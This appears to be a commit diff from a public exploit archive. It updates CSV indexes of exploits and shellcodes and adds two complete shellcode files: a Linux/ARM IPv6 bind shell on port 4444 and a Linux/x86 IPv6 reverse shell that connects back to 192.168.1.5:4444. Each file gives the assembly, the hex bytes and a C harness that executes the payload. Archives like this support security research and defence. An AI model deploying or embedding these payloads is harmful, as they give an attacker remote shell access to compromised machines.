39432,exploits/windows_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Local Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,local,windows_x86,
39433,exploits/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2016-02-10,"King's Way",local,linux,
39438,exploits/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,local,xml,
@ -9850,6 +9850,8 @@ id,file,description,date,author,type,platform,port
45137,exploits/windows/local/45137.py,"AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)",2018-08-02,"Luis Martínez",local,windows,
45130,exploits/linux/local/45130.py,"Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation",2018-08-02,0x09AL,local,linux,
45132,exploits/linux/local/45132.rb,"SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)",2018-08-02,0x09AL,local,linux,
45142,exploits/windows/local/45142.py,"Wedding Slideshow Studio 1.36 - Buffer Overflow",2018-08-03,Achilles,local,windows,
45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39726,7 +39728,7 @@ id,file,description,date,author,type,platform,port
45083,exploits/php/webapps/45083.rb,"Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)",2018-07-24,"Mehmet Ince",webapps,php,
45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
45125,exploits/php/webapps/45125.txt,"Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80
@ -39741,3 +39743,9 @@ id,file,description,date,author,type,platform,port
45133,exploits/xml/webapps/45133.txt,"Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection",2018-08-02,"Chris Moberly",webapps,xml,
45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
45141,exploits/php/webapps/45141.txt,"Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
45143,exploits/php/webapps/45143.txt,"PHP Template Store Script 3.0.6 - Cross-Site Scripting",2018-08-03,"Sarafraz Khan",webapps,php,80
45145,exploits/xml/webapps/45145.txt,"Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
45148,exploits/cgi/webapps/45148.txt,"cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal",2018-08-03,"Google Security Research",webapps,cgi,80

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -898,3 +898,5 @@ id,file,description,date,author,type,platform
45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86
45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
898 45039 shellcodes/linux_x86-64/45039.c Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes) 2018-07-17 Hashim Jawad shellcode linux_x86-64
899 45080 shellcodes/linux_x86/45080.c Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes) 2018-07-23 Kartik Durg shellcode linux_x86
900 45119 shellcodes/arm/45119.c Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes) 2018-08-01 Ken Kitahara shellcode arm
901 45139 shellcodes/linux_x86/45139.c Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes) 2018-08-03 Kartik Durg shellcode linux_x86
902 45144 shellcodes/arm/45144.c Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes) 2018-08-03 Ken Kitahara shellcode arm

137
shellcodes/arm/45144.c Normal file
View file

@ -0,0 +1,137 @@
/*
Title: Linux/ARM - IPv6 4444/TCP Bind Shellcode (128 Bytes)
Date: 2018-07-25
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $ cat bindshell-ipv6.s
.section .text
.global _start
_start:
.ARM
add r3, pc, #1
bx r3
.THUMB
// socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
mov r0, #10
mov r1, #1
eor r2, r2, r2
mov r7, #100
add r7, r7, #181
svc #1
// save fd
mov r4, r0
// bind(fd, &sockaddr, 28)
adr r1, struct_addr
// replace 0xff with NULL and set sin6_family to 0x0a (AF_INET6)
strb r2, [r1, #1]
// replace 1 with NULL and set sin6_flowinfo to NULL
str r2, [r1, #4]
// replace 1 with NULL and set sin6_addr to ::
str r2, [r1, #8]
str r2, [r1, #12]
str r2, [r1, #16]
str r2, [r1, #20]
// replace 1 with NULL and set sin6_scope_id to NULL
str r2, [r1, #24]
mov r2, #28
add r7, r7, #1
svc #1
// listen(host_sockid, 2)
mov r0, r4
mov r1, #2
add r7, r7, #2
svc #1
// accept(host_sockid, 0, 0)
mov r0, r4
eor r1, r1, r1
eor r2, r2, r2
add r7, r7, #1
svc #1
// save fd
mov r4, r0
// dup2(client_sockid, 0)
mov r7, #63
svc #1
// dup2(client_sockid, 1)
mov r0, r4
add r1, r1, #1
svc #1
// dup2(client_sockid, 2)
mov r0, r4
add r1, r1, #1
svc #1
// execve("/bin/sh", 0, 0)
eor r1, r1, r1
eor r2, r2, r2
adr r0, spawn
strb r2, [r0, #7]
mov r7, #11
svc #1
spawn:
.ascii "/bin/shA"
struct_addr:
.ascii "\x0a\xff" // sin6_family -> AF_INET6
.ascii "\x11\x5c" // sin6_port -> 4444
.byte 1,1,1,1 // sin6_flowinfo -> NULL
.byte 1,1,1,1 // sin6_addr -> ::
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1 // sin6_scope_id -> NULL
pi@raspberrypi:~ $ as -o bindshell-ipv6.o bindshell-ipv6.s && ld -N -o bindshell-ipv6 bindshell-ipv6.o
pi@raspberrypi:~ $ objcopy -O binary bindshell-ipv6 bindshell-ipv6.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell-ipv6.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x0a\x20\x01\x21\x52\x40\x64\x27\xb5\x37\x01\xdf\x04\x1c\x13\xa1\x4a\x70\x4a\x60\x8a\x60\xca\x60\x0a\x61\x4a\x61\x8a\x61\x1c\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x40\x52\x40\x01\x37\x01\xdf\x04\x1c\x3f\x27\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x49\x40\x52\x40\x01\xa0\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x41\x0a\xff\x11\x5c\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01
*/
#include<stdio.h>
#include<string.h>
unsigned char sc[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x0a\x20\x01\x21\x52\x40\x64\x27"
"\xb5\x37\x01\xdf\x04\x1c\x13\xa1"
"\x4a\x70\x4a\x60\x8a\x60\xca\x60"
"\x0a\x61\x4a\x61\x8a\x61\x1c\x22"
"\x01\x37\x01\xdf\x20\x1c\x02\x21"
"\x02\x37\x01\xdf\x20\x1c\x49\x40"
"\x52\x40\x01\x37\x01\xdf\x04\x1c"
"\x3f\x27\x01\xdf\x20\x1c\x01\x31"
"\x01\xdf\x20\x1c\x01\x31\x01\xdf"
"\x49\x40\x52\x40\x01\xa0\xc2\x71"
"\x0b\x27\x01\xdf\x2f\x62\x69\x6e"
"\x2f\x73\x68\x41\x0a\xff\x11\x5c"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01";
void main()
{
printf("Shellcode Length: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}

107
shellcodes/linux_x86/45139.c Normal file
View file

@ -0,0 +1,107 @@
# Title: Linux/x86 - Reverse TCP shell (IPv6) + Null Free
# Shellcode Author: Kartik Durg
# Shellcode Length: 86 BYTES
# Student-ID: SLAE-1233
# Note ~
https://iamroot.blog/2018/07/29/0x2-shell_reverse_tcp_ipv6-linux-x86/
# Description: Connect-back to IPV6 socket listening on IP
::FFFF:192.168.1.5 and port 4444.
/*
global _start
section .text
;References:
;(1)http://syscalls.kernelgrok.com/
;(2)https://www.3dbrew.org/wiki/Socket_Services
;(3)
https://www.ibm.com/support/knowledgecenter/en/ssw_ibm_i_71/rzab6/cafinet6.htm
_start:
;IPV6 socket creation
;int socketcall(int call, unsigned long *args);
;sockfd = socket(int socket_family, int socket_type, int protocol);
push byte 0x66 ;socketcall()
pop eax ;EAX=0x2
xor ebx,ebx ;zero out ebx
push 0x6 ; IPPROTO_TCP=6
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0xa ; AF_INET6
inc ebx ; Define SYS_socket = 1
mov ecx,esp ; save pointer (ESP) to socket() args (ECX)
int 0x80
xchg esi,eax ; sockfd stored in esi
xor eax,eax
;Connect
;connect(sockfd, (struct sockaddr*)&srvaddr, sizeof(srvaddr));
;int socketcall(int call, unsigned long *args);
push DWORD eax ;sin6_scope_id
push DWORD 0x0501a8c0 ;MY LOCAL IP = 192.168.1.5 | Can be configured to
YOUR's
push word 0xffff
push DWORD eax
push DWORD eax
push WORD ax ;inet_pton(AF_INET6, "::ffff:192.168.1.5",
&srvaddr.sin6_addr)
push DWORD eax ;sin6_flowinfo
push WORD 0x5c11 ;sin6_port=4444 | 0x5c11 | Configurable |
push WORD 0x0a ;AF_INET6
mov ecx,esp ;ECX holds pointer to struct
sockaddr_in6
push byte 0x1c ;sizeof(sockaddr_in6) | sockaddr_in6
= 28
push ecx ;pointer to sockfd
push esi ;sockfd
mov ecx,esp ;ECX points to args
inc ebx
inc ebx ;EBX = 0x3 | #define
SYS_Connect 3
push byte 0x66 ;socketcall()
pop eax
int 80h
push byte 0x2 ;push 0x2 on stack
pop ecx ;ECX = 2
;dup2() to redirect stdin(0), stdout(1) and stderr(2)
loop:
push byte 0x3f ;dup2()
pop eax ;EAX = 0x3f
int 0x80 ;exec sys_dup2
dec ecx ;decrement counter
jns loop ;if SF not set ==> keep on jumping
;execve(/bin//sh)
xor ecx,ecx ;clear ECX
push ecx ;Push NULL
push byte 0x0b ;execve() sys call number
pop eax ;EAX=0x2 | execve()
push 0x68732f2f ;(1)/bin//sh
push 0x6e69622f ;(2)/bin//sh
mov ebx,esp ;EBX pointing to /bin//sh”
int 0x80 ;Calling Interrupt for sys call
*/
/*
gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32
./shellcode
*/
#include<stdio.h>
unsigned char shellcode[] = \
"\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x68\xc0\xa8\x01\x05\x66\x6a\xff\x50\x50\x66\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}